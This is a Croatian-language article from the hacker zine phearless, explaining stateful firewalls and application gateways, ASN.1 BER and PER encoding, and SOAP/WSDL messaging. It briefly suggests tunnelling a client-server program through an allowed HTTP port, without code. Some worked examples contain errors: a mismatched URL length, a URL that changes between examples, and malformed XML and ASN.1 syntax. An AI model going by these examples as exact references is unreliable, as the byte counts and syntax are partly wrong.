Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

6x10 Payload parsing ASN.1 encode & SOAP

eZine's profile picture
eZine lover (@eZine)
Published in 
phearless
 · 14 Jan 2024

	                              
                             ................... 
                       ...::: phearless zine #6 :::... 
                                                            
................>---[ Payload parsing/ASN.1 encode & SOAP ]---<.................. 

......................>---[ by h44rP a.k.a. Laufer ]---<......................... 
                                                              haarp@phearless.org 

 

    [0x01]  The Imploding voice 

    [0x02]  ALG: the SIP B2BUA, easy filter & full INSPECT  

        <0x02a> Oldboy payload influence 
        <0x02b> SPF firewall integration & divine scent 

    [0x03]  ASN.1 encoding mess-up; BER vs. PER; + XER 
     
       <0x03a> A simple touch 
       <0x03b> BER/PER taken shots 

    [0x04]  WSDL, SOAP XML exposing 

       <0x04a> Schemes behind the scenes (WSDL) 
       <0x04b> SOAP header details 
       <0x04c> 1.1/1.2 version horizons 
       <0x04d> SOAP::Lite Perl (Another lays a dozen) 
         
    [0x05]  Exploding echoes 
           
           

/////////////////////////////////////////////////////////////////////////// 
-----> 0x01 The imploding Voice 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

 
   
       Ovaj put cu pokusati teoretski objasniti neke stvari.. nece puno biti 
prakticnog dijela.. prvenstveno jer nisam imao vremena koje bih mogao  
posvetiti nekom prevelikom razmisljanju, kodiranju i testiranju kako zbog 
nekih obveza u pocetku tako i zbog nekih prokletih bolestina kasnije pa cu evo 
pokusati kroz pricu pomoci nekom da shvati neke malo naprednije stvari, sto su 
kako rade i kako ih iskoristiti, a ujedno pomoci i shatteru da imamo veci broj 
tekstova za tekuci broj.. haha :) zez.. Neznam dal ce sve ispasti razumljivo.. 
shvatite da pisem pod temperaturom.. lekadol mi je spusti ali mi se sama 
odmah vrati na 39 pa ako bude gresaka, nebuloza, gluposti, vrijedjanja etc. 
molim da mi se ne zamjeri. :) barem ne previse. :) Nekako sam knjizevno  
nastrojen dok me ova bolest drzi pa mozda koncept ode u qrac.. :) Planiram 
mozda napravit kao tri pricice o nekim tehnologijama, potpuno odvojeno 
pojasnjene ali ipak nekako indirektno medjusobno povezane.. :) 

Kazem.. pokusat cu ovo malo prepricati iz svog aspekta odnosno saznanja i  
pomoci razjasniti neke od ovih stvari kako treba jer je literatura jako 
stura i tesko dostupna ako nas zanimaju detalji pa se nadam da nece biti 
problema shvatiti o cemu pricam i kako spomenute stvari funkcioniraju.. 
Kroz slijedece brojeve kada ce me nadam se iskreno i zdravlje valjda malo 
bolje sluziti cu skodirati i testirati neke stvari vezane s ovom temom da 
bi sve to bolje i razumljivije sjelo i pokazalo se u praksi.. Dosta puta  
cete vjerojatno naici na ubaceni neki kratki src ili vizualni primjer koji 
vas mozda omete ili se ucini naizgled kao potpuna digresija no cesto mi padne 
na pamet da bi bilo dobro ubaciti neki snippet kako bi vecina skuzila lakse 
o cemu se radi odnosno o cemu se direktno prica u odredjenim djelovima.. 

Vecina stvari je povezana.. negdje ce doci vjerojatno do neke manje digresije, 
neke stvari su potpuno distancirane i nevezane ali svejedno bitno je da 
shvatite malo neke pojmove i pojave unutar samih mreznih komunikacija kako 
bi vam bilo lakse se pozabaviti nekim napredinijim testiranjem i kodiranjem 
raznoraznih korisnih stvari... Dosta s pricom.. Vrijeme je da probam nesto  
korisno i napisati dok josh mogu svjesno sjediti i razmisljati...  

 

/////////////////////////////////////////////////////////////////////////// 
-----> 0x02 ALG: the SIP B2BUA, easy filter & full INSPECT 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

 

--==<[  0x02a Oldboy payload influence 
      \____________________________________________/ 

 
       Na pocetku sam odlucio pojasniti ALG i neke njemu svojstvene stvari.  
Dvojbeno je otkud poceti u ovako koncipiranom dokumentu ali valjda ce sve skupa 
imati smisla i nekakvu kronologiju. Dakle ALG odnosno Application Layer Gateway 
jest SIP "back to back user agent". Sto bi to znacilo. Pa recimo prvo nesto o  
SIP-u i razlici izmedju stateful i stateless filtriranja paketa. SIP odnosno  
Session Initiation Protocol jest IETF-ov protokol za incijalizaciju, modifici- 
ranje i terminaciju interaktivne korisnicke sesije. On je prakticki peer2peer  
protokol zbog proxy elemenata te je jednostavan aplikacijski protokol koji se  
najcesce koristi kod koristenja multimedijalnih elemenata u komunikaciji. No, 
vratimo se mi na filtriranje. Razlike izmedju packet inspektora bez statusa te 
stateful metode prilicno je jednostavna. Svaki bezstatusni firewall ima  
problema zbog nemogucnosti provjeravanja payloada prilikom usmjeravanja paketa. 
U proslom sam tekstu takodjer indirektno spominjao ove stvari kod NAT-a. Dakle 
prilikom primanja paketa na temelju konfiguracije se utvrdjuje validnost  
propustanja odredjene konekcije. jasno da bi razumijeli jasno sve morate znati 
tocnu strukturu i nacin kreiranja samog paketa u njegovom izvornom obliku.. 
slozite si par sniffera s pcap pa se igrajte malo.. znaci.. 

                                                 + 
      |---------------------------------------------------------| 
      |SRC:addr|DST:addr|SRC:port|DST:port|App payload / IP,port| 
      |---------------------------------------------------------|                                      
                                                 + 
                                                  
zanimljiv primjer analize: 

> > 00:44:36.309866 arp who-has 192.168.5.254 tell 192.168.5.164  
> > 0x0000 0001 0800 0604 0001 00c0 9f20 d3cd c0a8 ................  
> > 0x0010 05a4 0000 0000 0000 c0a8 05fe 4d2d 5345 ............M-SE  
> > 0x0020 4152 4348 202a 2048 5454 502f 312e ARCH.*.HTTP/1.  

 
0x0001 = ARP hardware type = ethernet  
0x0800 = ARP protocol type = 0x0800 indicira ARP za IP adrese  
0x06 = ARP hardware address size - sest za eternet MAC  
0x04 = ARP protocol address size - cetiri za IP adresu...  
0x0001 = ARP operation: 1 = arp REQUEST.  

ili recimo jedan potpuno drukciji koncept. evo jedan ethernet primjer. 
znaci, svaki header etherneta iznosi 14 bytova; (snippet pcap sniffera): 

----- code ----- 

#define SIZE 14 

	const struct sniff_ethernet *ethernet; /* ethernet header */ 
	const struct sniff_ip *ip;             /* IP header */ 
	const struct sniff_tcp *tcp;           /* TCP header */ 
	const char *payload;                   /* payload paketa */ 

	u_int size_ip; 
	u_int size_tcp; 

 
	ethernet = (struct sniff_ethernet*)(packet); 
	ip = (struct sniff_ip*)(packet + SIZE); 
	size_ip = IP_HL(ip)*4; 
	if (size_ip < 20) { 
		printf("   * Invalid IP header length: %u bytes\n", size_ip); 
		return; 
	} 
	tcp = (struct sniff_tcp*)(packet + SIZE + size_ip); 
	size_tcp = TH_OFF(tcp)*4; 
	if (size_tcp < 20) { 
		printf("   * Invalid TCP header length: %u bytes\n", size_tcp); 
		return; 
	} 
	payload = (u_char *)(packet + SIZE + size_ip + size_tcp); 

 
----- /code ----- 

ne obazirite se previse ako vam je nesh nejasno.. htio sam samo da ako vec 
je teze vizualno barem ovako vidite sam princip.. inace ovo je dobar primjer 
za adresiranje i memoriranje kod pointanja u ovakvim situacijama... recimo za 
primjer odozgo: tip* ('lok' stoji za "lokacija" bzvze..) 

----------------------------------------------- 
  Varijabla         |      Lokacija (byte)  
--------------------|-------------------------- 
sniff_ethernet      |    lok_1  
--------------------|-------------------------- 
sniff_ip            |    lok_1+SIZE  
--------------------|-------------------------- 
sniff_tcp           |    lok_1+SIZE+{velicina IP headera}  
--------------------|------------------------------------ 
payload             |    lok_1+SIZE+{velicina IP headera}+{velicina TCP header}  
------------------------------------------------------------------------------- 
                                    
Oni bezstatusni su u mogucnosti provjeriti iz zaglavlja tip protokola, adresu, 
brojeve fragmenata te portove. Kao sto je samo po sebi jasno kod filtriranja  
tipom protokola ogranicavamo odredjeni protokol (UDP/TCP/ICMP...) ali iznimno  
cesto nismo u mogucnosti da obavljamo ovako velika limitiranja jer uvijek ce 
nam neki servis traziti neki od osnovnih protokola kako bi bio u mogucnosti  
potpuno funkcionirati. Filtriranjem ip adresa jasno je isto tako da mozemo bez 
vecih problema ograniciti odredjene src adrese da nam pristupaju na odredjene 
hostove. Onemogucavanjem odredjenih portova ogranicavamo pristupe na servise  
koje nash firewall stiti i koje zelimo ostaviti nedostupnima. Znaci sve ono sto 
moze pruziti nekakav sigurnosni rizik u mogucnosti smo potpuno onemoguciti.  
Dakle i sami ste zakljucili o cemu se ovdje radi. Primjer je obican proxy  
server recimo za http. On dozvoljava samo uspostavljanje konekcija na http  
portu (80,8080..) i samo njih routa van na odredisne hostove s izmjenjenim  
headerima, ovisno o tipu proxy-a. Fragmentacija je takodjer bitan segment samog 
routanja i to u smislu routanja paketa koji imaju prevelike okvire. Routeri  
imaju mogucnost fragmentiranja tj. sjeckanja paketa na manje kako bi ih mogao  
dostaviti odredisnoj mrezi koja nakon primitka vraca sve u originalnu velicinu. 
Problem koji nam se ovdje javlja jest taj sto kod fragmentiranja kasnijih  
kronoloskih fragmenata koji nam ne nude port komunikacije pa ih stoga nije ni 
moguce fragmentirati pa su u slucaju odbacivanja nultog fragmenta beskorisni. 

Kao sto sam i spomenuo kod stateless filtriranja jest problem sto je nemoguce  
kontrolirati payload kao ni kontrola stanja konekcije koju posjeduju stateful 
packet inspektori. Kontroliranje sigurnosti ovim nacinom je u jednu ruku i 
dosta nepouzdano. Recimo da imate regulacijsku kontrolu stateless nacinom  
filtriranja i imate 80 port dozvoljen. Vrlo lako se moze integrirati kakav  
serv-cli program koji mozemo ubaciti u http kroz activeX kontrole i sl.  
Takodjer je nemoguce da se odredi kada se povratna konekcija odnosi na  
uspostavljenu konekciju sa druge mreze i sl.  

 
--==<[  0x02b SPF firewall integration & divine scent 
      \______________________________________________/ 

 
E pa sad. Posto je o stateless filtriranju mnogo toga odavno receno i sve je  
potpuno jednostavno ja sam se ovdje odlucio vise napisati o stateful nacinu  
inspekcije. Kao sto se iz naslova dvaju sekcija vidi odlucio sam iznijeti svoje 
stajaliste o aplikacijskom layer gateway filtru te cistom statefull paket  
filtriranju. Stoga se vratimo na ALG inspekciju sa pocetka price i 
razjasnimo neke stvari. Aplikacijski gateway, ako ga znamo kvalitetno  
konfigurirati je vjerojatno dovoljno rjesenje koje si mozemo priustiti. Pa  
vjerojatno se pitate po cemu su oni toliko specificni. Pa kao sto samo ime kaze 
oni potpuno fukcioniraju na "Application" sloju mreznog OSI modela te nam  
omogucava enormno vecu kontrolu prometa koji zelimo kontrolirati prilikom  
njegova prolaska kroz nash subnet. 

Aplikacijski gateway zapravo kreira dvije konekcije: jednu sa odredisnim  
strojem s vanjske strane gateway-a te zasebnu konekciju s nekom internom  
mashinom koja komunicira s externim hostom. Takodjer je moguce koristiti 
autentifikaciju iz internog subneta na gateway prilikom uspostavljanja sesije. 
Velika prednost stateful inspekcije jest daje mogucnost kreiranja takvih 
virtualnih sesija za pracenje connectionless prokola kao sto je recimo RPC! 

Dakle recimo jedan primjer.. koristenjem i analizom aplikacijske komunikacije 
vidjet cete da dolazi do razlika kako odredjeni firewalli reagiraju odnosno 
mogucnosti koje pruzaju i uspjesno implementiraju u radu.. bitno je da  
razlikujete obicne paket filtre koje sam vec gore spominjao, zatim ALG  
princip.. te potpuni Stateful nacin filtriranja paketa.. Cak i ALG samostalno 
nije uvijek u mogucnosti potpuno sve omoguciti odnosno kontrolirati sve  
segmente same komunikacije...    

evo pokusati cu sada generalizirati i pojasniti jedan primjer cistog stateful 
nacina inspekcije kakve koriste odredjene firewall tehnologije koje je  
prvenstveno implementiraju znaci na gateway-e u svrhu obostrane regulacije.. 
takav engine se naravno load-a u kernel samog gateway-a .. specificno je da 
on staje izmedju 2 i 3 layera odnosno Data Link i Network lejera. znamo da je 
data link zapravo NIC layer a network nam donosi IP.. znaci. ispitujuci ovaj 
dio presrecu se apsolutno svi paketi na svim interfejsovima i niti jedan  
paket nije proslijedjen preko niti jednog viseg hijerarhijskog layera bez 
obzira koji protokol i aplikaciju paket koristi. ovo sam vidio da je INSPECT 
dobro primjenio..  

primjer: 
                     ____________ 
 SERVER             |_APLIKACIJ._|                        __ KLIJENT 
   |                |_PREZENTAC._|                       | 
 -----              |___SESSION__|                     __|_ 
 | # |              |_TRANSPORT__|                    |    | 
 | # |              | __MREZNI___|                   _|_PC_|_ 
 | # |------------|<|###ENGINE###|>|----------------|________| 
 | # |            | |__DATALINK__| | 
 -----            | |__FIZICKI___| |----| 
    _________     |                     |     ___________ 
   |DINAMICKE|<---|                     |--> |SEC. POLICY| 
 |TABLICE STANJA|                            |___BASE____| 
 |--------------| 
  
Krenimo prvo od obicnog znaci packet filtra. dakle od davnih vremena se 
koriste i zapravo ih oduvijek implementiramo na routere i filtriramo 
promet preko IP adresa i sl. znaci.. oni funkcioniraju kako sam i rekao 
analizirajuci mrezni sloj i neovisni su o aplikaciji sto ih cini brzima. 
no dakako jasno je da je ovakva vrsta sigurnosti smijesna.. recimo da  
morate pustiti ili zatvoriti dinamicke portove.. znaci >1024 i sta.. znaci 
radit ce tone toga i dostupnost svakakvih servisa ce biti omogucena. 

ALG.. alg vec kao sto mu i samo ime kaze radi sa aplikacijskim slojem.. 
kako? spomenuo sam da se kreiraju dvije konekcije.. sa klijenta na gw tj. 
na firewall te ona sa gatewaya tj firewalla na odrediste.. tj recimo neki 
posluzitelj. iz svega skupa je jasno da je zapravo sve ovo nekako sporo tj. 
sama cinjenica da svaki servis potrebuje prakticki svoj proxy cini i sam ALG 
ponekad nedovoljnim zbog losijih performansi a isto tako limitirane liste 
aplikacija. 

Zato dolazi potpuni stateful inspection.. kako sam reko.. paket se presrece 
na mreznom sloju ali tada sve preuzima engine.. extrakira se state info za  
pravila sa svih app layera i cuva ih u dynamic state table.. odnosno kako sam 
gore naskrabao u dinamickoj tablici stanja.. znaci ukoliko niste sve potpuno 
shvatili.. o ovome sam pricao i prije.. ovdje je sada moguce sve.. nema vishe 
sranja oko povratne veze... nema vishe zajebancije koristenjem aktivnog/pasv 
ftp-a i tako dalje. cita se i najmanji segment paketa, pregledavaju se svi 
njegovi djelovi bitni za session i otvaraju odredjeni portovi koje zahtjeva 
komunikacija koja je uspostavljena.. odmah nakon prestanka komunikacije svi se 
portovi po potrebi zatvaraju i osiguravaju.. e sad.. ajmo malo na taj payload  
odnosno generalno na enkodanje.. 

 

/////////////////////////////////////////////////////////////////////////// 
-----> 0x03 ASN.1 encoding mess-up; BER vs. PER; + XER 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

 

--==<[  0x03a A simple touch 
      \____________________________________________/ 

 
       Sto je ASN.1? ASN sto stoji za Abstract Syntax Notation.One se moze 
u biti objasniti kao jezik za prikazivanje sutrukturiranih informacija  
uglavnom namjeravanih trasportiranju putem nekog prijenosnog medija. Zapravo 
je standardiziran i ucestalo koristen a u biti je jako malo prave dokumentacije 
koja bi nam mogla nesto vise o njemu reci. Znaci primarno je bilo putem njega 
poruku bitovati/bajtovati u protokol. Zapravo on dolazi na svoje kada je  
poruka koja se mora kodirati prilicno kompleksna. To je prvenstveno jer on sam 
dozvoljava i omogucava da se naprave kompleksne strukture.. Kao sto sam rekao 
koristi se da bi se definirali podaci omogucavajuci podesavanje parametara u 
protokolu bez brige oko nacina encodinga za transmisiju. razvojna faza: 

 ASN definicije------->ASN.1 kompajler----->npr. "C" strukture 
                                  | 
                                  |--------> enkoder/dekoder 
                                   
Davajuci zapravo opis poruke njena prezentacija se zapravo mijenja u odnosu na 
postavljena pravila enkodiranja. BER odnosno Basic Encoding Rules jest  
standardiziran u tu svrhu i pridruzen direktno ASN.1. Naknadno su dodana josh 
dva enkoding pravila.. to su CER tj. C(anonical)ER te D(istinguished)ER.. dakle 
oni su subseti BER-a..  

Pretpostavljam da nije sve bash najjasnije do sada u ovom dijelu pa cu probati  
malo usporiti i ipak ukljuciti jedan praktican dio... dakle recimo ovako.. 
znamo otprije za payload i sto se u njemu nalazi.. znaci.. taj payload mora 
nekako biti predstavljen kao dio samog paketa i mora se nekako sama poruka 
koja se nalazi u payloadu prilagoditi samom paketu i integrirati se u tom 
njegovom dijelu... prisjetimo se samog koncepta paketa:                                   
  
         |---------------------------------------------------------| 
         |SRC:addr|DST:addr|SRC:port|DST:port|App payload / IP,port| 
         |---------------------------------------------------------|                                      
                    
Dakle asn.1 je notacija za prikazivanje data struktura.. slicno kao deklaracija 
kod C/Cpp-a.. U jebem mu.. u sta se ja uvaljujem bzvze... arghhh... ovako. 
imate neku poruku.. koja se moze razlikovati naravno u mnogo pogleda.. i sad 
je morate enkodati kako biste je mogli prebaciti nekamo i na destinaciji cete 
je dekodirati.. znaci klasican koder/dekoder.. to je u jednom pogledu zapravo 
sam asn.1...  

 
--==<[  0x03b BER/PER taken shots 
      \____________________________________________/ 

 
evo neki obican primjer GET requesta...  
  
------ [code] ------ 
  
struct GetRequest { 
int headerOnly; // flag: zelimo li samo header? 
int lock; // flag: zelimo li provjeriti objekat? 
string url; // URL za fetch 
AcceptTypes* acceptTypes; // opcionalna lista prihvatljivih tipova 
}; 

struct AcceptTypes { 
List<bitset>* standardTypes; // lista bitmapa 
List<string>* otherTypes; // nestandardni tipovi 
}; 

GetRequest ::= [APPLICATION 0] IMPLICIT SEQUENCE { 
headerOnly BOOLEAN, 
lock BOOLEAN, 
acceptTypes AcceptTypes OPTIONAL 
url OCTET STRING, 

} 

AcceptTypes ::= [APPLICATION 1] IMPLICIT SEQUENCE { 
standardTypes [0] IMPLICIT SEQUENCE OF BIT STRING  
{html(0),plain-text(1),gif(2), jpeg(3)} OPTIONAL, 

otherTypes [1] IMPLICIT SEQUENCE OF OCTET STRING OPTIONAL 
} 

encoding primjer:  
  
(GetRequest  
:headerOnly TRUE  
:lock FALSE  
:acceptTypes (AcceptTypes  
:standardTypes ((html)  
(plain-text))) 
:url "/ses/magic/moxen.html.html")  
  
BER je original koji ide sa ASN.1-com.. i pretvara sve u nizove bitova i 
bajtova.. ber koristi tzv. tagLengthValue.. Svaki je element encodan kao 
tag, idicirajuci koji je tip, velicinu, i vrijednost tj. value koja je  
zapravo sadzraj samog objekta. Najjednostavniji tagovi zapravo se sastoje 
od jednog byta.. prva dva bita indiciraju klasu, slijedeci bit je flag koji 
govori o tipu, a ostalih 5 su tag broj. Ako je prevelik onda se pisu sve  
jedinice i tag se predstavlja u iducim bitovima. jedan bit se takodjer  
postavlja na "1" ako je dulje i na "0" ako stane u 7 bitova koji su u ovom 
slucaju mu na raspolaganju.  

primjer enkodanja od gore primjenjujuci BER: 
  
0x60 -- [0110|0000], [APPLICATION 0, Compound] - GetRequest 
0x80 -- [1000|0000], Indefinite length 

0x01 -- [0000|0001], [BOOLEAN] GetRequest.headerOnly 
0x01 -- [0000|0001], length 1 
0x01 -- [0000|0001], value TRUE 

0x01 -- [0000|0001], [BOOLEAN] GetRequest.lock 
0x01 -- [0000|0001], length 1 
0x00 -- [0000|0000] value FALSE 

0x61 -- [0110|0001], [APPLICATION 1, Compound] - GetRequest.types 
0x80 -- indefinite length 

0xa0 -- [1010|0000], [CONTEXT 0, Compound] types.standardTypes 
0x80 -- indefinite length 

0x03 -- [0000|0011] [BIT STRING] 
0x02 -- length 2 
0x04 -- Four bits unused 
0x80 -- [1000|0000] {html} 

0x03 -- [0000|0011] [BIT STRING] 
0x02 -- length 2 
0x04 -- Four bits unused 
0x40 -- [0100|0000] {plain-text} 

0x00 
0x00 -- End of list of standard Types 
0x00 
0x00 -- End of Accept Types 

0x04 -- [0000|0100], [OCTET STRING] GetRequest.url 
0x16 -- [0001|0110], length 22 
[/ses/magic/moxen.html.html] -- value 

0x00  
0x00 -- End of get request 
  
e sad... znaci za toliki url on je rjesio sa 50 bytova.. znaci BER.. 
ajmo sad vidjeti kako ce to rjesiti PER.. on je u biti packet encoding rule 
i koristi dosta drukcije kodiranje od BER-a. cilj PER-a je da bude sto 
kompaktniji i to mu je potpuno uspjelo.. kodiranje se tretira kao string bitova 
dopustajuci booleu i obicnim integerima ulazak zajedno u jedan bajt... 
evo primjer iste stvari s PER-om: 

[1] -- flag bit indicates acceptTypes is present 
[1] -- boolean, header only, TRUE 
[0] -- boolean, lock, FALSE 
[1] -- flag bit, indicates standardTypes is present 
[0] -- flag bit, indicates otherTypes is absent 
[000] -- pad bits to make length octet aligned 
[00000010] -- length of 2, -- 2 standardType bit strings to follow 
[1000] -- the first bit string, html is set 
[0100] -- the second bit string, plain-text is set 
[00010110] -- length 22; url is 22 octets long 
/ses/magic/moxen.html -- value of url 

[total size is 26, 22 url] 
  
u ovom je slucaju preko njega doslo 26 sto je znatna razlika... razlika 
je gotovo dvostruka, a da je koristen manji url bila bi i znatno veca razlika!  

Ajmo to pokusati jos jednostavnije srociti.. gledajte.. imate recimo neku 
vrijednost koji treba izraziti integerom.. recimo varijabla (0...7) znaci. 
recimo da je vrijdnost 6. BER ce to uciniti ovako: 

BER: 

      APP no. 1---------02 01 06----------APP no. 2 
                        |   |  | 
                        |   |  |__ vrijednost ---| 
                        |   |_____ velicina   ---|- 24bita 
                        |_________ tag        ---| 
                         
a pogledajte sad u istom primjeru kako ce to PER rjesiti: 

       
      APP no. 1---------1 1 0----------APP no. 2 
                        |_|_| 
                          |_____ 3 bita 

dakle nema tagova a sam nacin prezentacije encoda je znatno optimalniji od 
prethodnog. naravno jasno nam je kako ce XML encoding odnosno xER to uciniti. 
to bi bilo npr. <var>6</var> sto bi bilo oko 12 sto je i 12 okteta ukupno.. 

 

/////////////////////////////////////////////////////////////////////////// 
-----> 0x04 WSDL, SOAP XML exposing 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 
  

 
--==<[  0x04a Schemes behind the scenes (WSDL) 
      \____________________________________________/ 
  
  
       SOAP odnosno "Simple Object Access Protocol" jest jednostavan 
protokol za razmjenu informacija, odnosno poruka u nekom distribuiranom 
okruzenju. Baziran je na XML-u a sastoji se od tri osnovna dijela.. soap 
envelope-a koji definira framework za opisivanje poruke odnosno njenog 
sadrzaja i njenog procesuiranja, zatim pravila za encoding, i convension-a 
za reprezentiranje i odgovora na RPC-ove. soap se moze koristiti zajedno sa 
velikim brojem protokola no njegova najcesca primjena jest preko HTTP-a.   
naravno http app's po rfc-u moraju koristiti html/xml u http message-ima..   

No, krenimo otpocetka.. odnosno od samih web servisa.. prvo prepostavljam 
da ste culi dosta o WSDL-u.. tj. Web Services Description Language-u. 

                       
                    ###Directory###<_______<_____   /--###Dir. QUERY's### 
       Service     /               \             \-/    (takodjer SOAP) 
     description--/------SOAP-------\-query reply| 
       (WSDL)    /        |          \   preko   | 
                /         |           \  WSDL-a  | 
               /    XML request(WSDL)  \         | 
  ###Provider###-----------------------###Korisnik### 
          |___>____XML odgovor(WSDL)_____>___| 
  
  
dakle.. neki servis ima directory opis published.. recimo npr. UDDI.. nisu 
naravno iskljucene ni druge vrste directory-a.. zatim korisnik salje query-e 
direktoriju da locira servis i utvrdi pravila odnosno nacin kako ce s njime 
komunicirati. dio provide-anog wsdl-a se daje korisniku kojim mu se govori 
kakav requesti i odgovori odgovaraju service provideru. zatim korisnik 
naravno salje request preko wsdl-a providerui te ovaj daje odgovarajuci 
odgovor. znaci sve ove poruke gore se salju koriste upravo SOAP! dakle jasno 
vam je da on omogucuje slanje web service poruka. dakle jednostavnije soap 
je skup xml dokumenata konstruiranih po soap specifikacijama. stvarni primjer: 

znaci.. klijent moze recimo poslati soap doc. http-om web serveru na kojem je 
naravno web servis koji recimo u ovom slucaju daje informacije o korisnickim 
racunima: 

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> 
  <SOAP-ENV:Body> 
    <SendAccountBalance> 
      <accountNumber xsi:type="xsd:int">12345678</accountNumber> 
    </SendAccountBalance> 
  </SOAP-ENV:Body> 
</SOAP-ENV:Envelope> 

zatim naravno web servis eventualno odgovara: 

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> 
  <SOAP-ENV:Body> 
    <AccountBalanceResponse> 
      <accountNumber xsi:type="xsd:int">12345678</accountNumber> 
      <accountBalance xsi:type="xsd:decimal">932.73</accountBalance> 
      <ResponseDateTime xsi:type="xsd:datetime">2005-06-15T11:21:00-06:00 
      </ResponseDateTime> 
    <AccountBalanceResponse> 
  /SOAP-ENV:Body> 
</SOAP-ENV:Envelope> 
  
Dakle sto vidimo iz ovog jednostavnog primjera.. klijent salje jednostavan 
zahtjev za stanjem nekog racuna odredjenog korisnika.. sto se jasno vidi 
iz soap message-a.. zatim mu servis odgovara soap-om jerdnostavim reply-om 
u kojem navodi stanje za odredjeni upit te isto tako biljezi i salje vrijeme 
odnosno datum zatrazivanja odredjene operacije odnosno stanja.. 
SOAP envelope element je osnovni element SOAP poruke te definira XML dokument 
kao soap poruku. 

u c-u bi recimo takav jednostavan request izgledao kao: 

SendAccountBalance(int accountNumber) 

 
--==<[  0x04b SOAP header details 
      \____________________________________________/ 

 
takodjer je bitan sam soap header koji sadrzi specificne informacije aplikacije 
kao sto su auth itd. primjer: 

<soap:Header> 
<m:Trans 
xmlns:m="URL" 
soap:mustUnderstand="1">5</m:Trans> 
</soap:Header> 

ono sto prvo upada u oko jest "trans" element te 'mustunderstand' koji je u  
ovom primjeru potvrdan odnosno ima vrijednost "1"; isto tako naravno regularna 
vrijednost "5". tri su atributa koja definira soap.. uz ovaj koji se prisutan 
gore u navedenom primjeru "mustunderstand" josh imamo "encodingstyle" te  
"actor". ovi atributi zapravo pomazu odnosno govore primatelju kako ce se 
procesuirati same soap poruke. znaci o cemu se radi.. krenimo po redu: 

"mustunderstand" 

dakle ovaj atribut sluzi da kaze primatelju dali se moze sam header zaobici 
odnosno ignorirati ili je obavezan za procesuiranje. dakle mogucnosti su 
'0' i '1'.. ako se u nekom slucaju daje ="1" tada se indicira da primatelj 
procesuira header i prepozna element. ako se element ne prepozna tada sama 
analiza headera moze proci neuspjesno. 

"actor" 

actor atribut je takodjer jednostavan i logican te sluzi za adresiranje  
neke usputne adrese na pathu odnosno stazi puta samog paketa.. primer: 
neki dio soap poruke nije namijenjen pravom odredistu tocnije onom doslovno 
kranjem racunalu nego taj specificni dio mora ostati na jednoj adresi kojom 
prolazi na svojem path-u te to odrediste definiramo upravo ovim atributom.. 
primjer: 

<soap:Header> 
<m:Trans xmlns:m="URL_DEST" soap:actor="URL">5</m:Trans> 
</soap:Header> 

"encodingstyle" 

ovaj atribut sluzi za definiranje vrste podataka u dokumentu.. po defaultu 
soap poruka nema encodinga.. 

<?xml version="1.0"?> 
<soap:Envelope 
xmlns:soap="URL" 
soap:encodingStyle="URL"> 
... 
info poruke 
... 
</soap:Envelope> 
  

--==<[  0x04c 1.1/1.2 version horizons 
      \____________________________________________/ 
       
       
izmedju odvih dvaju verzija ubacene su odredjene promjene koje su u mnogocemu 
promijenile neke manje segmente.. krenimo od pocetka.. 1.1 verzija kako ste 
i sami prmijetili dozvoljavala je dodatne elemente iza body elementa.. dok  
1.2 verzija to ne dozvoljava. 

<e:Envelope ...> 
  <e:Header> 
  </e:Header> 
  <e:Body> 
      Body 
  </e:Body> 
</e:Envelope> 

dakle u ovom 1.2 ver primjeru nema dodatnih elemenata nakon body dijela.. 
actor atribut  se u drugoj verziji naziva "role" ali je princip i smisao 
ostao prilicno isti. 

takodjer se javljaju novi fault kodovi u 1.2 verziji: 

"DTDNotSupported"     - poruka sadrzi type deklaraciju 
"DataEncodingUnknown" - nepoznat encoding style 

isto tako kod 1.1 moguce je produziti fault koristeci "." dok kod 1.2 nije 
te je doslo takodjer do promjene kod 'misunderstood' faulta odnosno njegovog 
headera za report. 

znacajno je izmjenjen i dio za multireference vrijednost.. odnosno u 1.2 ih  
je moguce potpuno integrirati u odredjeni dio dok je kod 1.1 to moguce samo 
da ih se ukljuci naknadno. isto tako neke razlike u encodingu: 

                     SOAP 1.1  	             SOAP 1.2 
                      
Attribute 	     href                    ref 
Type 	             uri-reference 	     IDREF 

 
arrayevi su se takodjer nesto izmijenili.. tako vise nema arrayType nego je 
zamijenjen "ItemType" i "ArraySize" atributima.  npr: 

<num enc:arrayType="xs:int[5]"> kod 1.1 te: 

<num enc:itemType="xs:int" enc:arraySize="5"> 

to su neke od osnovnih razlika.. isto tako RPC error subcode je dodan u 1.2 
verziji kao "ProcedureNotPresent" i "BadArguments" kao i imenovanje povratnih 
rpc vrijednosti.. sve u svemu nije prisutno nekih iznimno drasticnih promjena.. 

 
--==<[  0x04d SOAP::Lite Perl (Another lays a dozen) 
      \_____________________________________________/    

 
soap:lite za perl je u biti skup modula koji omogucuju jednostavan i lagan 
interfejs za sam SOAP. i na klijent i na server strani komunikacije.. 
install bez root privilegija: 

---------------------------- 
  # perl -MCPAN -e shell 

  > o conf make_arg -I~/lib 
  > o conf make_install_arg -I~/lib 
  > o conf makepl_arg LIB=~/lib PREFIX=~ INSTALLMAN1DIR=~/man/man1 
                                         INSTALLMAN3DIR=~/man/man3 
  > install SOAP::Lite 
---------------------------- 

primjer klijenta: 

---------------------------- 
  #!perl -w 

  use SOAP::Lite; 
  print SOAP::Lite 
    -> proxy('http/tcp...') ====> adresa prihvacanja poziva ovisno o serveru 
    -> uri('URI element')   ====> pomaze serveru u rukovanju zadanim requestom 
    -> blah()               ====> ime pristupa i njegovi parametri 
    -> result; 
---------------------------- 

prakticki sam SOAP implementira veliku funkcionalnost za web-servise te je po 
meni najbolja podrska perlu te se u vrlo malo koda moze odraditi dobra service 
izgradnja... zadnja je verzija 0.67.. sam kod zna biti prilicno kompliciran za  
modificiranje i slicne stvari.. sve u svemu je jako zanimljivo pogotovo kada se 
malo vise udje u same, stvarne, mogucnosti svega skupa.. 

